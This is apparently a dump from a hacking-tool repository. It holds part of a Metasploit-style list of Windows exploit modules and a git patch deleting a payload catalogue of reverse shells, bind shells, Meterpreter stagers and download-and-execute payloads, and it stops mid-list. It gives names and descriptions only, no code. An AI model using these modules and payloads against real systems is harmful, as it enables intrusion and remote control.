Overflow - windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow - windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow - windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow - windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow - windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write - windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow - windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow - windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow - windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow - windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow - windows/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector - windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server - windows/misc/windows_rsh 2007-07-24 average No Windows RSH Daemon Buffer Overflow - windows/misc/wireshark_lua 2011-07-18 excellent No Wireshark console.lua Pre-Loading Script Execution - windows/misc/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow - windows/mmsp/ms10_025_wmss_connect_funnel 2010-04-13 great No Windows Media Services ConnectFunnel Stack Buffer Overflow - windows/motorola/timbuktu_fileupload 2008-05-10 excellent No Timbuktu Pro Directory Traversal/File Upload - windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent No Lyris ListManager MSDE Weak sa Password - windows/mssql/ms02_039_slammer 2002-07-24 good Yes MS02-039 Microsoft SQL Server Resolution Overflow - windows/mssql/ms02_056_hello 2002-08-05 good Yes MS02-056 Microsoft SQL Server Hello Overflow - windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption - windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection - windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution - windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution - windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution - windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection - windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution - windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse - windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow - windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential - windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow - windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow - windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE - windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow - windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution - windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow - windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow - windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow - windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow - windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow - windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow - windows/nuuo/nuuo_cms_fu 2018-10-11 manual No Nuuo Central Management Server Authenticated Arbitrary File Upload - windows/nuuo/nuuo_cms_sqli 2018-10-11 normal No Nuuo Central Management Authenticated SQL Server SQLi - windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload - windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution - windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow - windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow - windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow - windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow - windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow - windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution - windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow - windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow - windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow - windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow - windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution - windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload - windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow - windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow - windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal - windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow - windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow - windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow - windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow - windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow - windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution - windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 - windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow - windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow - windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow - windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities - windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection - windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution - windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow - windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow - windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow - windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow - windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow - windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow - windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow - windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow - windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution - windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 - windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow - windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 - windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow - windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow - windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow - windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow - windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow - windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow - windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow - windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource - windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource - windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution - windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow - windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow - windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow - windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow - windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow - windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow - windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow - windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow - windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit - windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit - windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow - windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) - windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption - windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference - windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability - windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption - windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ - windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution - windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow - windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution - windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution - windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery - windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution - windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow - windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution - windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow - windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow - windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow - windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow - windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow - windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow - windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow - windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow - windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass - windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow - windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow - windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow - windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow - windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow - windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow - windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow - windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow - windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution - windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow - windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow - windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution - windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow - windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow - windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow - windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow - windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow - windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow - windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) - windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow - windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow - windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow - windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow - windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow - windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution - windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite - - From 6b8b725e3b54bb3c25386940e45a63949b8a55d9 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 01:43:53 +0100 Subject: [PATCH 137/214] Delete payloads.txt --- tools/payloads.txt | 553 --------------------------------------------- 1 file changed, 553 deletions(-) delete mode 100644 tools/payloads.txt diff --git a/tools/payloads.txt b/tools/payloads.txt deleted file mode 100644 index b6725fb..0000000 --- a/tools/payloads.txt +++ /dev/null @@ -1,553 +0,0 @@ -Payloads -======== - - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline - aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline - aix/ppc/shell_interact normal No AIX execve Shell for inetd - aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline - android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager - android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager - android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager - android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline - android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline - android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline - android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager - android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager - android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager - apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline - apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline - apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline - apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline - apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline - apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline - apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline - bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x64/exec normal No BSD x64 Execute Command - bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) - bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP - bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline - bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) - bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP - bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline - bsd/x86/exec normal No BSD Execute Command - bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP - bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline - bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) - bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager - bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager - bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) - bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager - bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) - bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline - bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline - bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) - bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager - bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager - bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline - bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline - bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline - cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges - cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP - cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits - cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP - cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) - cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) - cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) - cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) - cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) - cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) - cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 - cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) - cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) - cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 - cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) - cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) - cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 - cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) - cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) - cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) - cmd/unix/generic normal No Unix Command, Generic Command Execution - cmd/unix/interact normal No Unix Command, Interact with Established Connection - cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) - cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) - cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) - cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) - cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) - cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) - cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) - cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) - cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) - cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) - cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) - cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) - cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) - cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) - cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) - cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) - cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) - cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) - cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) - cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) - cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) - cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) - cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) - cmd/windows/adduser normal No Windows Execute net user /ADD CMD - cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) - cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) - cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 - cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) - cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS - cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) - cmd/windows/generic normal No Windows Command, Generic Command Execution - cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) - cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) - cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) - cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) - firefox/exec normal No Firefox XPCOM Execute Command - firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) - firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) - generic/custom normal No Custom Payload - generic/debug_trap normal No Generic x86 Debug Trap - generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline - generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline - generic/tight_loop normal No Generic x86 Tight Loop - java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline - java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline - java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager - java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager - java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager - java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager - java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager - java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager - java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline - linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline - linux/armle/adduser normal No Linux Add User - linux/armle/exec normal No Linux Execute Command - linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager - linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager - linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - 